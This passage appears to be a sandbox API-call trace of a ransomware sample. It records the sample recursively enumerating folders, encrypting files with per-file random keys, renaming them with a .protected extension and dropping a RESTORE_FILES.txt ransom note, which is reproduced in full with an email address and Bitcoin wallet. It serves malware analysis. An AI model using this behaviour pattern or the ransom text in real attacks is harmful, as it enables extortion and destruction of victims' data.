nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0075.690] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.690] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0075.850] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0075.850] CloseHandle (hObject=0xb4) returned 1 [0075.850] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected") returned 98 [0075.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected")) returned 1 [0075.851] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.851] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0075.851] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt") returned 89 [0075.851] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.935] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.935] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.936] lstrlenA (lpString="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") returned 684 [0075.936] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.936] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.936] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0075.936] CloseHandle (hObject=0xa4) returned 1 [0075.936] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="Windows") returned -1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="Program Files") returned -1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0075.937] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="System Volume Information") returned -1 [0075.937] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 82 [0075.937] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2=".") returned 1 [0075.937] lstrcmpW 
(lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="..") returned 1 [0075.937] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*") returned 84 [0075.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.996] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.996] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.996] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.996] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.998] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.999] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\.") returned 84 [0075.999] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.999] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.999] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.999] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.999] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.999] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.999] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.999] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\..") returned 85 [0075.999] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0075.999] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0075.999] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned 91 [0075.999] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0075.999] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0076.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*") returned 93 [0076.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0076.000] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.000] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.000] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.000] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.000] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\.") returned 93 [0076.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.000] 
FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.000] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.000] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.000] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.000] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.000] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\..") returned 94 [0076.000] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.000] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.000] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.000] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Windows") returned -1 [0076.000] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files") returned 1 [0076.001] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files (x86)") returned 1 [0076.001] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$Recycle.bin") returned 1 [0076.001] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="System Volume Information") returned 1 [0076.001] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned 114 [0076.001] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0076.001] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0076.001] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*") returned 116 [0076.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0076.001] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.001] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.001] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.001] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.001] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.001] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\.") returned 116 [0076.001] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.001] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.002] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.002] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.002] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.002] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.002] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.002] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\..") returned 117 [0076.002] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.002] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.002] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0076.002] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0076.002] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.002] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0076.002] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0076.002] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.002] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0076.002] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.002] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0076.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.003] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0076.003] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0076.003] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0076.003] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.047] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.047] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.047] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.047] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.136] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.136] CloseHandle (hObject=0xd8) returned 1 [0076.265] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 133 [0076.265] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.protected")) returned 1 [0076.266] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Windows") returned -1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files") returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files (x86)") returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$Recycle.bin") returned 1 [0076.266] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="System Volume Information") returned 1 [0076.266] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.266] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".protected") returned 0x0 [0076.266] lstrcmpW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0076.266] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.266] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295ec74*=0x30) returned 1 [0076.266] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.299] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.299] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0076.299] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.299] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".rar") returned 0x0 [0076.299] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0076.299] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".zip") returned 0x0 [0076.299] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.318] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.318] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, 
lpOverlapped=0x0) returned 1 [0076.430] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.430] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.433] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.433] CloseHandle (hObject=0xd8) returned 1 [0076.434] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 150 [0076.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.protected")) returned 1 [0076.434] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0076.434] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0076.434] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 132 [0076.435] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0076.482] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour 